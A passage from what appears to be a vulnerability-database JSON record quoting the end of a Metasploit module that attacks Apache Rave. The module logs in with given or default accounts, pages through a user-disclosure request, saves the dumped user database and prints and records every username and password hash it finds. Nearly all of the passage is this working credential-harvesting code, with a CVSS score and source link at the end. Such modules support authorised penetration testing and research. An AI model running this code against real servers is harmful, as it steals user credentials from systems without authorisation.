Vulnerable. Proceeding...\")\n else\n print_error(\"#{rhost}:#{rport} - Apache Rave #{version} found. Not vulnerable. Aborting...\")\n return\n end\n else\n print_warning(\"#{rhost}:#{rport} - Apache Rave Portal not found, trying to log-in anyway...\")\n end\n\n cookie = nil\n unless datastore[\"USERNAME\"].empty? or datastore[\"PASSWORD\"].empty?\n print_status(\"#{rhost}:#{rport} - Login with the provided credentials...\")\n cookie = login(datastore[\"USERNAME\"], datastore[\"PASSWORD\"])\n if cookie.nil?\n print_error(\"#{rhost}:#{rport} - Login failed\")\n else\n print_good(\"#{rhost}:#{rport} - Login Successful. Proceeding...\")\n end\n end\n\n if cookie.nil?\n print_status(\"#{rhost}:#{rport} - Login with default accounts...\")\n @default_accounts.each { |user, password|\n print_status(\"#{rhost}:#{rport} - Login with the #{user} default account...\")\n cookie = login(user, password)\n unless cookie.nil?\n print_good(\"#{rhost}:#{rport} - Login Successful. Proceeding...\")\n break\n end\n }\n end\n\n if cookie.nil?\n print_error(\"#{rhost}:#{rport} - Login failed. Aborting...\")\n return\n end\n\n print_status(\"#{rhost}:#{rport} - Disclosing information...\")\n offset = 0\n search = true\n\n while search\n print_status(\"#{rhost}:#{rport} - Disclosing offset #{offset}...\")\n users_data = disclose(cookie, offset)\n if users_data.nil?\n print_error(\"#{rhost}:#{rport} - Disclosure failed. Aborting...\")\n return\n else\n print_good(\"#{rhost}:#{rport} - Disclosure successful\")\n end\n\n json_info = JSON.parse(users_data)\n\n path = store_loot(\n 'apache.rave.users',\n 'application/json',\n rhost,\n users_data,\n nil,\n \"Apache Rave Users Database Offset #{offset}\"\n )\n print_status(\"#{rhost}:#{rport} - Information for offset #{offset} saved in: #{path}\")\n\n print_status(\"#{rhost}:#{rport} - Recovering Hashes...\")\n json_info[\"result\"][\"resultSet\"].each { |result|\n print_good(\"#{rhost}:#{rport} - Found cred: #{result[\"username\"]}:#{result[\"password\"]}\")\n report_cred(\n ip: rhost,\n port: rport,\n service_name: 'Apache Rave',\n user: result[\"username\"],\n password: result[\"password\"],\n proof: user_data\n )\n }\n\n page = json_info[\"result\"][\"currentPage\"]\n total_pages = json_info[\"result\"][\"numberOfPages\"]\n offset = offset + json_info[\"result\"][\"pageSize\"]\n if page == total_pages\n search = false\n end\n\n end\n\n end\nend\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/apache_rave_creds.rb"}]}